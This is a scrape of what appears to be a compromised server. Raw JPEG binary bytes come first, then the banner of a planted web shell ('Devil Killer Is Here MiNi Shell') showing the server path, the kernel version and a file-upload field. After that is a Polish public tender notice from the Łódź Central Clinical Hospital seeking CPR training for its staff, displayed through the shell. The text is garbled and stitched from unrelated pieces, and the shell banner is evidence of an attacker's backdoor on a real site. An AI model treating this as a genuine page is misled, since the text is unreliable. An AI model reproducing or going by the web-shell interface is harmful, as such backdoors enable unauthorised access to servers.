JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241021/0055622601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Przeprowadzenie szkoleń z zakresu resuscytacji krążeniowo - oddechowej (RKO) dla SP ZOZ CSK UM w Łodzi” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej Centralny Szpital Kliniczny w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472147559</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pomorska 251</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">92-213</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.owczarek@csk.umed.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.csk.umed.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przeprowadzenie szkoleń z zakresu resuscytacji krążeniowo - oddechowej (RKO) dla SP ZOZ CSK UM w Łodzi” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-41d819e8-3ec4-444a-ad1e-5e0c49bef77e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00556226</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00212777/72/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Usługa szkolenia z zakresu resuscytacji krążeniowo - oddechowej (RKO) na potrzeby SP ZOZ CSK UM w Łodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/csk_umed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/csk_umed</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1. Informacje ogólne<br/>8.1.1. Postępowanie o udzielenie niniejszego zamówienia prowadzone jest w języku polskim.<br/>8.1.2. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>elektronicznie przy użyciu Platformy Zakupowej dostępnej pod adresem: https://platformazakupowa.pl/pn/csk_umed<br/>8.1.3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z:<br/>https://platformazakupowa.pl/strona/1-regulamin<br/>8.1.4. Minimalne wymagania techniczne i informacje na temat kodowania i czasu odbioru danych są opisane na Stronie<br/>platformazakupowa.pl.<br/>8.1.5. Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej<br/>pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>8.1.6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową Zamawiającego, co oznacza, że<br/>godzina określona na platformie zakupowej jest godziną przyjętą przez Zamawiającego przy określaniu terminu wpływu oferty,<br/>wniosków, dokumentów i oświadczeń.<br/>8.1.7. Wykonawca na każde żądanie Zamawiającego niezwłocznie potwierdza fakt otrzymania zawiadomienia, wniosku lub<br/>informacji. Potwierdzenia należy przesłać również za pośrednictwem platformy zakupowej.<br/>8.1.8. W kwestiach budzących wątpliwości odnośnie zapisów SWZ Wykonawcom przysługuje prawo do wnoszenia wniosków o<br/>wyjaśnienie jej treści.<br/>8.1.9. Składanie wniosków o wyjaśnienie treści SWZ, o których mowa powyżej odbywa się za pośrednictwem platformy zakupowej,<br/>poprzez polecenie „WYŚLIJ WIADOMOŚĆ” jako załącznik, dostępne przy zamieszczonym postępowaniu.<br/>8.1.10. Zamawiający zwraca się z prośbą, aby ewentualne zapytania Wykonawca przesyłał również drogą elektroniczną – na<br/>Platformie, w dokumencie edytowalnym (np. word).<br/>8.1.11. Wyjaśnienia SWZ udzielane są w szczególności z zachowaniem zasad określonych w ustawie Prawo zamówień publicznych.<br/>8.1.12. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. – w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452.) oraz<br/>Rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. - w sprawie rodzajów dokumentów, jakie może<br/>żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz.U. z 2020 poz. 2415.).<br/>8.1.13. Jednocześnie Zamawiający informuje, iż kontakt – zarówno z Zamawiającym jak i osobami uprawnionymi do<br/>porozumiewania się z Wykonawcami – inny niż wskazany w niniejszym rozdziale SWZ jest niedopuszczalny.<br/>8.2. Informacje o sposobie komunikowania się zamawiającego z wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, w tym w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69;<br/>1. W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności<br/>składanie ofert oraz oświadczeń, w tym wniosków, zawiadomień oraz informacji odbywa się przy użyciu środków komunikacji<br/>elektronicznej, za pośrednictwem: https://platformazakupowa.pl/pn/csk_umed<br/>2. Wobec nie zaistnienia sytuacji, o których mowa w art. 65 ust. 1, art. 66, art. 69, Zamawiający nie przewiduje innego sposobu<br/>komunikowania się niż przy użyciu środków komunikacji elektronicznej.<br/>3. W korespondencji kierowanej do Zamawiającego Wykonawca winien posługiwać się numerem sprawy określonym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">3.15.) RODO (obowiązek informacyjny): 1. Na podstawie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych - zwane dalej RODO), pragniemy Państwa<br/>poinformować, że: <br/>Ogłoszenie nr 2024/BZP 00212777/72/P Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>2. Administratorem Pani/Pana danych osobowych jest Samodzielny Publiczny Zakład Opieki Zdrowotnej Centralny Szpital Kliniczny<br/>Uniwersytetu Medycznego w Łodzi (ul. Pomorska 251, 92-213 Łódź, KRS: 0000149790, NIP: 728-22-46-128).<br/>3. Administrator wyznaczył Inspektora Ochrony Danych Osobowych. Dane kontaktowe: ul. Pomorska 251, 92-213 Łódź, email:<br/>inspektor.odo@csk.umed.pl, tel. 42 675 76 22.<br/>4. Administrator przetwarza Pani/Pana dane osobowe w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>pod nazwą: „Przeprowadzenie szkoleń z zakresu resuscytacji krążeniowo - oddechowej (RKO) dla SP ZOZ CSK UM w Łodzi” – na<br/>podstawie art. 6 ust. 1 lit. c RODO.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 i inne ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (z późniejszymi zmianami), dalej zwana<br/>„Pzp”, a także podmiotom uprawnionym – na podstawie umów o powierzenie przetwarzania danych osobowych (w szczególności<br/>podmiotom wspierających administratora w organizacji postępowania o udzielenie zamówienia publicznego).<br/>6. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy, uwzględniając okres rękojmi i gwarancji oraz okres przedawnienia roszczeń.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego –<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>8. Posiada Pani/Pan:<br/>8.1. prawo dostępu do danych osobowych Pani/Pana dotyczących (art. 15 RODO);<br/>8.2. prawo do sprostowania Pani/Pana danych osobowych (art. 16 RODO) – przy czym skorzystanie z prawa sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>8.3. prawo żądania od Administratora ograniczenia przetwarzania danych osobowych (art. 18 RODO) – z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, to jest prawa do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>5.1. prawo do usunięcia danych osobowych (w związku z art. 17 ust. 3 lit. b, d lub e RODO);<br/>5.2. prawo do przenoszenia danych osobowych (o którym mowa w art. 20 RODO);<br/>5.3. prawo sprzeciwu, wobec przetwarzania danych osobowych (na podstawie art. 21 RODO), gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>6. W przypadku gdy osoba, której dane dotyczą wnosi do Administratora o:<br/>6.1. potwierdzenie, czy przetwarzane są dane jej dotyczące;<br/>6.2. uzyskanie dostępu do danych jej dotyczących oraz informacji o:<br/>6.2.1. celach przetwarzania;<br/>6.2.2. kategoriach odnośnych danych osobowych;<br/>6.2.3. informacji o odbiorcach lub kategoriach odbiorców, którym dane osobowe zostały lub zostaną ujawnione (w szczególności o<br/>odbiorcach w państwach trzecich lub organizacjach międzynarodowych);<br/>6.2.4. planowanym okresie przechowywania danych lub kryteriach ustalania tego okresu;<br/>6.2.5. prawie do żądania od Administratora sprostowania, usunięcia lub ograniczenia przetwarzania danych osobowych dotyczącego<br/>osoby, której dane dotyczą̨, oraz do wniesienia sprzeciwu wobec takiego przetwarzania;<br/>6.2.6. prawie wniesienia skargi do organu nadzorczego;<br/>6.2.7. źródle danych osobowych jeżeli nie zostały one zebrane od osoby, której dane dotyczą;<br/>6.2.8. zautomatyzowanym podejmowaniu decyzji, w tym o profilowaniu oraz istotnych zasadach ich podejmowania;<br/>6.3. uzyskanie informacji o odpowiednich zabezpieczeniach (o których mowa w art. 46 ogólnego rozporządzenia o ochronie danych),<br/>związanych z przekazaniem jeżeli dane osobowe są przekazywane do państwa trzeciego lub organizacji międzynarodowej,<br/>6.4. dostarczenie kopii danych podlegających przetwarzaniu; a wykonanie powyższych obowiązków wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu<br/>ewentualnie wskazania nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>7. W przypadku wystąpienia przez osobę, której dane dotyczą do Administratora z żądaniem ograniczenia przetwarzania, żądanie to<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub<br/>konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/166/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1. Przedmiotem zamówienia jest realizacja zdania pn.: „Przeprowadzenie szkoleń z zakresu resuscytacji krążeniowo -<br/>oddechowej (RKO) dla SP ZOZ CSK UM w Łodzi”, w szczególności przeprowadzenie szkoleń z zakresu resuscytacji<br/>krążeniowo - oddechowej (RKO) w standardzie BLS (ang. Basic Life Support) dla personelu pielęgniarskiego oraz<br/>pozostałego personelu medycznego i niemedycznego oraz w standardzie BLS (ang. Basic Life Support) z elementami ALS<br/>dla personelu lekarskiego.<br/>2.2. Przedmiotem zamówienia jest przeprowadzenie szkoleń z zakresu resuscytacji krążeniowo – oddechowej (RKO):<br/>2.2.1. w standardzie BLS (ang. Basic Life Support) dla personelu pielęgniarskiego oraz pozostałego personelu medycznego<br/>i niemedycznego szczegółowo określonych poniżej,<br/>2.2.2. w standardzie BLS (ang. Basic Life Support) z elementami ALS dla personelu lekarskiego.<br/>2.3. Przeprowadzenie szkoleń o standardzie BLS stanowi wymóg jednego ze standardów akredytacyjnych (OP3).<br/>2.4. Realizacja cyklu szkoleń będzie następowała w dni robocze tj. od poniedziałku do piątku, z wyłączeniem dni ustawowo<br/>wolnych od pracy.<br/>2.5. Szkolenia będą realizowane sukcesywnie na terenie siedziby Zamawiającego, w szczególności: w Łodzi przy ul.<br/>Pomorskiej 251, ul. Sterlinga 13, ul. Pankiewicza16 /Sporna 36/50 oraz innych lokalizacjach wskazanych przez Zamawiającego w dokumentach Zamawiającego<br/>2.6. Łącznie liczba osób planowanych do przeszkolenia wynosi: 3.526 pracowników, w tym szkolenie dla personelu<br/>lekarskiego z elementami ALS zaplanowano dla: 1.250 osób – liczna osób może ulec zmianie, zgodnie z wskazaniami<br/>Zamawiającego w SWZ.<br/>2.7. Zakres szkolenia z elementami ALS powinien zawierać, w szczególności:<br/>• Farmakoterapię w NZK (Nagłe zatrzymanie krążenia)<br/>• Monitorowanie/rozpoznanie zaburzenia rytmu serca w zatrzymaniu krążenia<br/>• Defibrylację manualną<br/>2.8. Zamawiający wymaga przeprowadzenie szkoleń w terminie od dnia podpisania umowy prze okres 3 miesięcy, w<br/>następujących cyklach: od 8 do 15 dni w każdym miesiącu, w dni robocze tj. od poniedziałku do piątku, z wyłączeniem <br/>ustawowo wolnych od pracy. W jednym dniu planowane jest przeszkolenie minimum 3 grup 20 osobowych – liczba osób<br/>biorących udział w szkoleniu w danej grupie może ulec zmianie.<br/>2.9. W danym dniu, szkolenia będą wykonywane w godz. np. 8:00-10:00 / 10:30-12:30 /13:00-15:00 (godziny do<br/>uzgodnienia z Zamawiającym) - 3 szkolenia w ciągu dnia.<br/>2.10. Przewidywany czas jednego szkolenia danej grupy to min. 2 godziny zegarowe.<br/>2.11. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 3 do SWZ i we wzorze umowy - załącznik nr 6<br/>– Istotne postanowienia umowne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79632000-3 - Szkolenie pracowników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4.3. Zamawiający zgodnie z art. 441 ust. 1 korzysta z prawa opcji, w związku z czym precyzuje:<br/>- określenie rodzaju i maksymalnej wartości: zamówienie o dodatkowe max. 80% ilości szkoleń (wielkości świadczenia)<br/>przedstawionych w SWZ. W takim przypadku warunki realizacji pozostają bez zmian,<br/>- określenie okoliczności skorzystania z opcji: w związku z zwiększeniem liczby personelu Zamawiającego np. zatrudnienie,<br/>przejęcie pracowników itp.<br/>- powyższe nie modyfikuje ogólnego charakteru umowy.<br/>4.4. Zamawiający zobowiązuje się do zrealizowania przedmiotu umowy w wysokości minimalnej 50% wartości brutto<br/>umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria (Zamawiający przyjął, że w zakresie każdego kryterium oceny ofert: 1% stanowi 1 punkt):<br/>16.1.1. Cena – 60,00% (60 pkt),<br/>16.1.2. Termin płatności faktury– 40,00 % (40 pkt)<br/>16.2. Za najkorzystniejszą zostanie uznana oferta, która otrzyma łącznie najwyższą liczbę punktów w kryteriach, o których mowa w<br/>pkt. 16.1. Liczba punktów jest zaokrąglana do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.5. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postepowaniu opisane w<br/>SWZ.<br/>6.5.1. Zamawiający w zakresie zdolności do występowania w obrocie gospodarczym nie precyzuje żadnych wymagań,<br/>których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>6.5.2. Zamawiający nie stawia wymagań w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów.<br/>6.5.3. Zamawiający w zakresie sytuacji ekonomicznej lub finansowej: nie precyzuje żadnych wymagań, których spełnienie<br/>Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>6.5.4. Zamawiający w zakresie zdolności technicznej lub zawodowej - precyzuje wymagania:<br/>6.5.4.1. Wykonawca dysponuje lub będzie dysponował osobami które przeprowadzą szkolenia tj. minimum 6 osobami, które<br/>posiadają odpowiednie kwalifikacje, w tym: dyplomowani lekarze, pielęgniarki/pielęgniarze, ratownicy medyczni, instruktorzy<br/>z doświadczeniem 